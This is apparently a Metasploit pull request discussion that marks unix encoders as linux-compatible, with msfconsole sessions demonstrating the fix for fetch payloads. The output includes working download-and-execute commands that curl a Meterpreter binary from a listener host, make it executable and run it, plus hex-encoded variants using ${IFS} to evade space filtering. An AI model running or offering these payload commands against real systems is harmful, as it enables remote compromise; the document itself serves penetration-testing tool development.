Mark unix encoders as compatible with linux

[zeroSteiner]

Fixes #18572 by marking the existing unix encoders as also being compatible with linux. There are currently no encoder modules that are marked as compatible with linux so when an exploit author intends to use the new fetch payloads, they can't set the bad characters in the payload hash of the module.

Verification

• Start msfconsole
• use payload/cmd/linux/http/x64/meterpreter/reverse_tcp or one of the other linux payload modules
• Generate the payload with at least one bad character and see that an encoder is automatically selected and used instead of receiving an error

New and fixed

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw -b '\x20'
/bin/echo${IFS}-ne${IFS}'\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x39\x2e\x31\x32\x38\x3a\x38\x30\x38\x30\x2f\x6a\x76\x45\x5f\x67\x6a\x44\x4b\x78\x75\x51\x6f\x38\x36\x2d\x39\x31\x54\x69\x74\x4e\x51\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x3b\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x20\x26'|sh

Old and broken

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw -b '\x20'
[-] Payload generation failed: cmd/linux/http/x64/meterpreter/reverse_tcp: All encoders failed to encode.

[bwatters-r7]

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      WCQjNFZajXcu     no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
curl -so /tmp/WCQjNFZajXcu http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/WCQjNFZajXcu; /tmp/WCQjNFZajXcu &
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw -b '\x20'
/bin/echo${IFS}-ne${IFS}'\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x57\x43\x51\x6a\x4e\x46\x5a\x61\x6a\x58\x63\x75\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x35\x2e\x31\x33\x35\x2e\x32\x30\x31\x3a\x38\x30\x38\x30\x2f\x76\x33\x76\x5a\x78\x52\x33\x50\x2d\x73\x74\x75\x4b\x57\x6a\x55\x65\x36\x70\x43\x65\x41\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x57\x43\x51\x6a\x4e\x46\x5a\x61\x6a\x58\x63\x75\x3b\x20\x2f\x74\x6d\x70\x2f\x57\x43\x51\x6a\x4e\x46\x5a\x61\x6a\x58\x63\x75\x20\x26'|sh
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 

[bwatters-r7]

Release Notes

This enhancement marks the existing unix encoders as also being compatible with linux. Previously, no encoder modules were marked as compatible with linux, so users could not set bad character when using the new fetch payloads.